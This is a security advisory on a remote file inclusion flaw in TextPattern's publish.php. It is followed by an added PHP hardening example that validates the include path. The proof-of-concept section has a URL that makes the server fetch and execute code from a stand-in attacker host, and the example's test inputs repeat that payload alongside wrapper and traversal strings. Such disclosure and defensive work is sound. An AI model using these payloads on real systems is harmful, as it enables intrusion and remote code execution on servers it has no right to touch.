----------------------------------------------------------------------------
 TextPattern <=g1.19 (txpcfg[txpath]) Remote File Inclusion Vulnerability
----------------------------------------------------------------------------

Author       : Zeni Susanto A.K.A Bithedz
Date Found   : October 25th, 2006
Location     : Bandung, Indonesia
Critical Lvl : Highly critical
Impact       : System access
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : TextPattern
Version     : <=g1.19
URL         : http://textpattern.com/deanload/textpattern_g119.zip

TextPattern is a free, flexible, elegant, easy-to-use content management system for all kinds of websites, including weblogs.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

In the file publish.php the following line is vulnerable:
--------------------------publish.php---------------------------------------
define("txpath",$txpcfg['txpath']);
----------------------------------------------------------------------------

The value of $txpcfg['txpath'] is used to define the txpath constant without being validated. When PHP's register_globals is enabled, a request parameter named txpcfg[txpath] populates that array before publish.php runs, so a remote attacker controls the directory from which the script subsequently includes files. This can be exploited to execute arbitrary PHP code by including files from local or external resources (the remote case additionally requires allow_url_fopen to be enabled in php.ini).

Proof Of Concept:
~~~~~~~~~~~~~~~~~

http://yourtargetsite/[textpattern_g119_path]/textpattern/publish.php?txpcfg[txpath]=http://attact/colok.txt?

The trailing "?" turns whatever file name publish.php appends to txpath into a query string on the attacker's server, so http://attact/colok.txt is fetched and executed unchanged.

Solution:
~~~~~~~~~

- Sanitize the variable $txpcfg['txpath'] in the affected files (only accept an existing local directory set by the configuration file).
- Turn off register_globals.
- As defense in depth, disable allow_url_fopen (and allow_url_include on PHP 5.2 and later) so include() cannot fetch remote URLs.

---------------------------------------------------------------------------

Shoutz:
~~~~~~~
~ K-159
~ Monik My Brain
~ #bridge (silent) @irc.dal.net
---------------------------------------------------------------------------

Contact:
~~~~~~~~
bithedz[at]gmail[dot]com
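The following is an added illustration of the fix the Solution section describes; it is not code from the advisory or from the TextPattern project. It assumes that publish.php builds its include paths from the txpath constant and that the trusted value normally comes from config.php (stood in for here by an inline assignment); the file name txplib_db.php in the comment, the helper name safe_txpath and the sample inputs are all constructed for the example.

```php
<?php
// Added example (not Textpattern's own code). Shows how publish.php could
// validate $txpcfg['txpath'] before defining txpath, so that a value injected
// through register_globals (?txpcfg[txpath]=http://attact/colok.txt?) can
// never reach a later "include txpath . '/lib/txplib_db.php';" (assumed usage).

/**
 * Return the canonical path if $candidate is an existing directory inside $base,
 * otherwise false. Rejects URL/stream wrappers (http://, php://, ftp://, ...)
 * and anything that resolves outside $base through "..".
 */
function safe_txpath($candidate, $base)
{
    if (!is_string($candidate) || $candidate === '') {
        return false;
    }
    // Any scheme prefix means a remote or wrapper include: refuse it outright.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $candidate)) {
        return false;
    }
    $real     = realpath($candidate);
    $baseReal = realpath($base);
    if ($real === false || $baseReal === false || !is_dir($real)) {
        return false;
    }
    // Prefix check on the canonical paths, with a separator so "/srv/txp2"
    // is not accepted as being under "/srv/txp".
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real !== rtrim($baseReal, DIRECTORY_SEPARATOR)
        && strpos($real . DIRECTORY_SEPARATOR, $prefix) !== 0) {
        return false;
    }
    return $real;
}

// Constructed inputs: the advisory's PoC payload, a stream wrapper, a path
// traversal attempt, and the value a correct config.php would supply.
$base  = dirname(__FILE__);
$cases = array(
    'http://attact/colok.txt?',   // remote file inclusion payload from the PoC
    'php://input',                // stream wrapper, would include the POST body
    '../../../../../../etc',      // traversal outside the install directory
    $base,                        // legitimate local install path
);
foreach ($cases as $c) {
    $r = safe_txpath($c, $base);
    printf("%-28s => %s\n", $c, $r === false ? 'rejected' : 'accepted: ' . $r);
}

// How the hardened publish.php would then proceed: reset the array so a
// register_globals-injected element cannot survive, load the trusted config
// (inline here instead of "require 'config.php';"), validate, then define.
$txpcfg = array();
$txpcfg['txpath'] = $base;
$path = safe_txpath($txpcfg['txpath'], $base);
if ($path === false) {
    header('HTTP/1.0 500 Internal Server Error');
    exit('Invalid txpath configuration');
}
define('txpath', $path);
echo "txpath defined as ", txpath, "\n";
```

Resetting $txpcfg before loading the configuration is what actually closes the register_globals hole; the validation function is the second layer for the case where config.php itself is missing or leaves the key unset. Turning register_globals and allow_url_fopen off in php.ini, as the Solution section says, should still be done regardless of the code change.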